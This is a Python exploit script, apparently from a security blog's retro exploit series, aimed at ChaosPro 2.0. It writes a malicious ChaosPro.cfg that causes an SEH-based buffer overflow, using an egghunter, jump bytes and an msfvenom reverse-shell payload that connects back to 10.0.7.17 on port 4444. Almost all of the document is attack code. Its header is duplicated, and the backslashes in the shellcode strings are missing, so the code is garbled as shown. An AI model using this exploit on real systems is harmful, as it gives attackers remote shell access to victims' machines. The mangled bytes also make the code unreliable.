#!C:Python27python.exe

# Title : ChaosPro 2.0
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3 #!C:Python27python.exe

# Title : ChaosPro 2.0
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html

#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "x40x75x80x75"
jmpforward06 = "x40x75x06x75"

# our egghunter shellcode
egghunter = (
"x66x81xcaxffx0fx42x52x31xdbx43"
"x43x53x58xcdx2ex3cx05x5ax74xec"
"xb8x54x30x30x57x89xd7xafx75xe7"
"xafx75xe4xffxe7"
)

# our egg!
payload = "T00WT00W"

#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b 'x00'
"x89xe1xdbxd7xd9x71xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4cx42x53x30"
"x33x30x43x30x55x30x4bx39x4bx55x46x51x4fx30x32"
"x44x4cx4bx56x30x56x50x4cx4bx46x32x54x4cx4cx4b"
"x50x52x45x44x4cx4bx34x32x37x58x44x4fx4fx47x30"
"x4ax36x46x30x31x4bx4fx4ex4cx47x4cx45x31x43x4c"
"x44x42x56x4cx47x50x4fx31x58x4fx34x4dx45x51x39"
"x57x4bx52x4cx32x56x32x31x47x4cx4bx46x32x32x30"
"x4cx4bx50x4ax47x4cx4cx4bx30x4cx32x31x52x58x4b"
"x53x31x58x53x31x4ex31x36x31x4cx4bx50x59x37x50"
"x45x51x58x53x4cx4bx47x39x35x48x4dx33x37x4ax30"
"x49x4cx4bx57x44x4cx4bx53x31x49x46x46x51x4bx4f"
"x4ex4cx39x51x58x4fx54x4dx45x51x4fx37x36x58x4d"
"x30x33x45x4ax56x43x33x43x4dx4cx38x57x4bx43x4d"
"x56x44x42x55x5ax44x31x48x4cx4bx46x38x31x34x35"
"x51x4ex33x35x36x4cx4bx34x4cx30x4bx4cx4bx56x38"
"x45x4cx55x51x38x53x4cx4bx54x44x4cx4bx45x51x38"
"x50x4dx59x51x54x46x44x56x44x31x4bx31x4bx43x51"
"x31x49x50x5ax30x51x4bx4fx4bx50x51x4fx31x4fx51"
"x4ax4cx4bx32x32x4ax4bx4cx4dx31x4dx42x48x47x43"
"x57x42x53x30x55x50x35x38x53x47x43x43x30x32x31"
"x4fx31x44x33x58x30x4cx33x47x57x56x54x47x4bx4f"
"x49x45x48x38x4ax30x35x51x43x30x35x50x56x49x59"
"x54x36x34x36x30x52x48x56x49x4bx30x52x4bx35x50"
"x4bx4fx59x45x30x50x56x30x56x30x46x30x51x50x36"
"x30x57x30x46x30x55x38x4ax4ax54x4fx39x4fx4bx50"
"x4bx4fx39x45x4dx47x42x4ax35x55x52x48x45x5ax53"
"x30x33x37x34x51x52x48x45x52x53x30x54x51x31x4c"
"x4dx59x5ax46x32x4ax52x30x50x56x46x37x32x48x5a"
"x39x59x35x54x34x43x51x4bx4fx39x45x4dx55x49x50"
"x33x44x44x4cx4bx4fx30x4ex44x48x43x45x5ax4cx35"
"x38x4cx30x48x35x4fx52x36x36x4bx4fx49x45x55x38"
"x52x43x52x4dx52x44x43x30x4bx39x4bx53x56x37x46"
"x37x31x47x50x31x4ax56x33x5ax42x32x51x49x46x36"
"x4bx52x4bx4dx53x56x4fx37x51x54x57x54x37x4cx53"
"x31x43x31x4cx4dx50x44x31x34x34x50x58x46x55x50"
"x30x44x31x44x30x50x30x56x50x56x50x56x30x46x36"
"x36x50x4ex31x46x50x56x50x53x31x46x43x58x52x59"
"x58x4cx47x4fx4bx36x4bx4fx49x45x4dx59x4dx30x50"
"x4ex30x56x57x36x4bx4fx36x50x45x38x44x48x4cx47"
"x35x4dx45x30x4bx4fx49x45x4fx4bx5ax50x48x35x59"
"x32x30x56x42x48x4ex46x4ax35x4fx4dx4dx4dx4bx4f"
"x4ex35x37x4cx54x46x53x4cx54x4ax4dx50x4bx4bx4b"
"x50x52x55x33x35x4fx4bx31x57x54x53x54x32x32x4f"
"x43x5ax33x30x31x43x4bx4fx4ex35x41x41"
)

#line containing our payload
line_start = "Username "
line_start += payload + " "

#line with our overflow
line_start += "ProjectPath "
junk = line_start

junk += "A" * (2705 - len(jmpforward06) - len(jmpback80) - len(egghunter))

# our egghunter ...
junk += egghunter

# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "x50x49x40"

# write the evil file
with open('C:\Documents and Settings\Administrator\My Documents\Downloads\cpro20\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)